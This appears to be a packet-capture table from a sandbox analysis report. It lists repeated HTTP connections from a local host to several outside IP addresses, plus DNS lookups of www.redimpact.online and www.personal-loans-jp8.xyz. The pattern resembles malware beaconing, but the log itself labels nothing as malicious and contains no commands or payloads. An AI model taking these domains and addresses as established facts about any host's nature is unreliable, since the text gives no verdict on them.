Oct 15, 2024 16:20:25.320231915 CEST	80	53125	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:25.321453094 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:25.324151039 CEST	80	53125	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:25.335264921 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:25.345243931 CEST	53125	80	192.168.2.6	96.126.123.244
Oct 15, 2024 16:20:25.350167036 CEST	80	53125	96.126.123.244	192.168.2.6
Oct 15, 2024 16:20:31.101118088 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:31.106163979 CEST	80	53126	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:31.106451035 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:31.123330116 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:31.128407955 CEST	80	53126	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:32.092654943 CEST	80	53126	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:32.133197069 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:32.275218010 CEST	80	53126	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:32.275274038 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:32.643378019 CEST	53126	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:33.655122995 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:33.660432100 CEST	80	53127	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:33.660588980 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:33.673111916 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:33.678152084 CEST	80	53127	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:34.645158052 CEST	80	53127	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:34.758111000 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:35.074474096 CEST	80	53127	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:35.074798107 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:35.075062037 CEST	80	53127	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:35.076107979 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:35.180151939 CEST	53127	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:36.199958086 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:36.205076933 CEST	80	53128	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:36.205219030 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:36.216567039 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:36.221573114 CEST	80	53128	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:36.221587896 CEST	80	53128	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:37.209669113 CEST	80	53128	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:37.369163990 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:37.398159981 CEST	80	53128	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:37.401329041 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:37.727071047 CEST	53128	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:38.753460884 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:38.759103060 CEST	80	53129	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:38.759191990 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:38.773154020 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:38.778166056 CEST	80	53129	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:39.793029070 CEST	80	53129	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:39.869097948 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:39.982742071 CEST	80	53129	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:39.986061096 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:39.986062050 CEST	53129	80	192.168.2.6	103.144.219.16
Oct 15, 2024 16:20:39.990916967 CEST	80	53129	103.144.219.16	192.168.2.6
Oct 15, 2024 16:20:45.928000927 CEST	53130	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:45.933136940 CEST	80	53130	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:45.937330008 CEST	53130	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:45.949074030 CEST	53130	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:45.954360962 CEST	80	53130	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:46.675717115 CEST	80	53130	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:46.675779104 CEST	53130	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:47.465090036 CEST	53130	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:47.470204115 CEST	80	53130	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:48.481518984 CEST	53131	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:48.486519098 CEST	80	53131	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:48.486587048 CEST	53131	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:48.500741959 CEST	53131	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:48.506531000 CEST	80	53131	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:49.279032946 CEST	80	53131	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:49.284079075 CEST	53131	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:50.013056040 CEST	53131	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:50.021182060 CEST	80	53131	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:51.027111053 CEST	53132	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:51.032095909 CEST	80	53132	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:51.039087057 CEST	53132	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:51.047079086 CEST	53132	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:51.052160978 CEST	80	53132	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:51.052252054 CEST	80	53132	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:51.755410910 CEST	80	53132	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:51.755532026 CEST	53132	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:52.554974079 CEST	53132	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:52.559952974 CEST	80	53132	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:53.575427055 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:53.580483913 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:53.583561897 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:53.591087103 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:53.596060038 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.415195942 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.415462971 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.415476084 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.415504932 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.416627884 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.416666985 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.416976929 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.416987896 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.416999102 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.417026043 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.418298960 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.418313980 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.418339968 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.419559002 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.419598103 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.420438051 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.459728003 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:54.459846973 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.460870981 CEST	53133	80	192.168.2.6	84.32.84.32
Oct 15, 2024 16:20:54.465713978 CEST	80	53133	84.32.84.32	192.168.2.6
Oct 15, 2024 16:20:59.481584072 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:20:59.486852884 CEST	80	53134	47.57.185.227	192.168.2.6
Oct 15, 2024 16:20:59.487481117 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:20:59.501064062 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:20:59.506028891 CEST	80	53134	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:00.644406080 CEST	80	53134	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:00.850642920 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:00.854639053 CEST	80	53134	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:00.855041981 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:00.863362074 CEST	80	53134	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:00.863423109 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:01.011400938 CEST	53134	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:02.027137041 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:02.033041954 CEST	80	53135	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:02.033133984 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:02.045878887 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:02.051114082 CEST	80	53135	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:03.031419039 CEST	80	53135	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:03.087126017 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:03.235764027 CEST	80	53135	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:03.237183094 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:03.565170050 CEST	53135	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:04.574551105 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:04.579528093 CEST	80	53136	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:04.579636097 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:04.592959881 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:04.598252058 CEST	80	53136	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:04.598268032 CEST	80	53136	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:05.612040997 CEST	80	53136	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:05.664273024 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:05.828380108 CEST	80	53136	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:05.829097986 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:06.101834059 CEST	53136	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:07.120021105 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:07.125181913 CEST	80	53138	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:07.125607967 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:07.132059097 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:07.136975050 CEST	80	53138	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:08.124227047 CEST	80	53138	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:08.165030956 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:08.326946020 CEST	80	53138	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:08.327514887 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:08.328793049 CEST	53138	80	192.168.2.6	47.57.185.227
Oct 15, 2024 16:21:08.333830118 CEST	80	53138	47.57.185.227	192.168.2.6
Oct 15, 2024 16:21:22.202020884 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.206958055 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.207045078 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.222727060 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.227613926 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.905992031 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.906186104 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.906193972 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.906275988 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.907147884 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.907155037 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.907217979 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.908116102 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.908121109 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.908173084 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.909281969 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.909293890 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.909348965 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.910273075 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.910327911 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:22.911173105 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.911523104 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:22.911597967 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:23.024761915 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:23.024924994 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:23.025085926 CEST	80	53139	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:23.025079966 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:23.025207996 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:23.726953030 CEST	53139	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:24.751032114 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:24.756112099 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:24.756202936 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:24.768769979 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:24.773920059 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.431929111 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.432086945 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.432094097 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.432301044 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:25.433010101 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.433017015 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.433779001 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.433785915 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.433814049 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:25.434830904 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.434838057 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.435772896 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.436331987 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:25.437261105 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.437320948 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:25.437442064 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.437448978 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.441025972 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:25.557476044 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.557655096 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.558706999 CEST	80	53140	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:25.560292006 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:26.273689985 CEST	53140	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:27.293262005 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:27.298480988 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:27.298654079 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:27.313064098 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:27.318636894 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:27.318669081 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.053348064 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.053447008 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.053468943 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.053692102 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.054567099 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.054588079 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.054744959 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.055423021 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.055442095 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.055458069 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.055887938 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.056606054 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.056626081 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.056806087 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.058805943 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.059053898 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.059087992 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.059336901 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.171785116 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.171991110 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.172049046 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.172112942 CEST	80	53141	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:28.172173977 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:28.820605040 CEST	53141	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:29.840168953 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:29.845334053 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:29.845971107 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:29.853645086 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:29.858786106 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.560199022 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.560417891 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.560431004 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.560753107 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.561326027 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.561342001 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.561543941 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.562354088 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.562366962 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.562393904 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.563327074 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.563338995 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.563405991 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.564321041 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.564362049 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.565556049 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.565741062 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.565773010 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.677289009 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.677484035 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.677666903 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:30.677681923 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.677813053 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.683881998 CEST	53142	80	192.168.2.6	162.0.213.94
Oct 15, 2024 16:21:30.688796997 CEST	80	53142	162.0.213.94	192.168.2.6
Oct 15, 2024 16:21:35.805071115 CEST	53143	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:35.810075045 CEST	80	53143	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:35.813735962 CEST	53143	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:35.825145006 CEST	53143	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:35.829999924 CEST	80	53143	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:37.339322090 CEST	53143	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:37.344814062 CEST	80	53143	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:37.351047993 CEST	53143	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:38.355408907 CEST	53144	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:38.360336065 CEST	80	53144	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:38.360434055 CEST	53144	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:38.373410940 CEST	53144	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:38.378264904 CEST	80	53144	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:39.885023117 CEST	53144	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:39.891020060 CEST	80	53144	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:39.893147945 CEST	53144	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:40.903800964 CEST	53145	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:40.909151077 CEST	80	53145	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:40.909218073 CEST	53145	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:40.925317049 CEST	53145	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:40.930399895 CEST	80	53145	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:40.930464029 CEST	80	53145	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:42.431529045 CEST	53145	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:42.437071085 CEST	80	53145	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:42.437119961 CEST	53145	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:43.449731112 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:43.454699039 CEST	80	53146	85.159.66.93	192.168.2.6
Oct 15, 2024 16:21:43.461535931 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:43.465456963 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:21:43.470518112 CEST	80	53146	85.159.66.93	192.168.2.6
Oct 15, 2024 16:22:44.445557117 CEST	80	53146	85.159.66.93	192.168.2.6
Oct 15, 2024 16:22:44.492300987 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:22:44.600492954 CEST	80	53146	85.159.66.93	192.168.2.6
Oct 15, 2024 16:22:44.600651026 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:22:44.601824999 CEST	53146	80	192.168.2.6	85.159.66.93
Oct 15, 2024 16:22:44.606673002 CEST	80	53146	85.159.66.93	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 15, 2024 16:19:15.880321026 CEST	51475	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:19:16.295870066 CEST	53	51475	1.1.1.1	192.168.2.6
Oct 15, 2024 16:19:20.487190008 CEST	53	49645	162.159.36.2	192.168.2.6
Oct 15, 2024 16:19:21.120277882 CEST	53	61241	1.1.1.1	192.168.2.6
Oct 15, 2024 16:19:32.449338913 CEST	49524	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:19:32.650319099 CEST	53	49524	1.1.1.1	192.168.2.6
Oct 15, 2024 16:19:45.936171055 CEST	53461	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:19:45.951471090 CEST	53	53461	1.1.1.1	192.168.2.6
Oct 15, 2024 16:19:54.272120953 CEST	51082	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:19:55.274288893 CEST	51082	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:19:55.349127054 CEST	53	51082	1.1.1.1	192.168.2.6
Oct 15, 2024 16:19:55.349144936 CEST	53	51082	1.1.1.1	192.168.2.6
Oct 15, 2024 16:20:16.716188908 CEST	63223	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:20:17.019424915 CEST	53	63223	1.1.1.1	192.168.2.6
Oct 15, 2024 16:20:30.359076977 CEST	57039	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:20:31.092780113 CEST	53	57039	1.1.1.1	192.168.2.6
Oct 15, 2024 16:20:45.001075029 CEST	62946	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:20:45.918092012 CEST	53	62946	1.1.1.1	192.168.2.6
Oct 15, 2024 16:20:59.464804888 CEST	55201	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:20:59.478987932 CEST	53	55201	1.1.1.1	192.168.2.6
Oct 15, 2024 16:21:13.340774059 CEST	55798	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:21:14.104413033 CEST	53	55798	1.1.1.1	192.168.2.6
Oct 15, 2024 16:21:22.170599937 CEST	57485	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:21:22.198594093 CEST	53	57485	1.1.1.1	192.168.2.6
Oct 15, 2024 16:21:35.701035023 CEST	55933	53	192.168.2.6	1.1.1.1
Oct 15, 2024 16:21:35.798217058 CEST	53	55933	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 15, 2024 16:19:15.880321026 CEST	192.168.2.6	1.1.1.1	0x47f4	Standard query (0)	www.redimpact.online	A (IP address)	IN (0x0001)	false
Oct 15, 2024 16:19:32.449338913 CEST	192.168.2.6	1.1.1.1	0x15c2	Standard query (0)	www.personal-loans-jp8.xyz	A (IP address)	IN (0x0001)	false
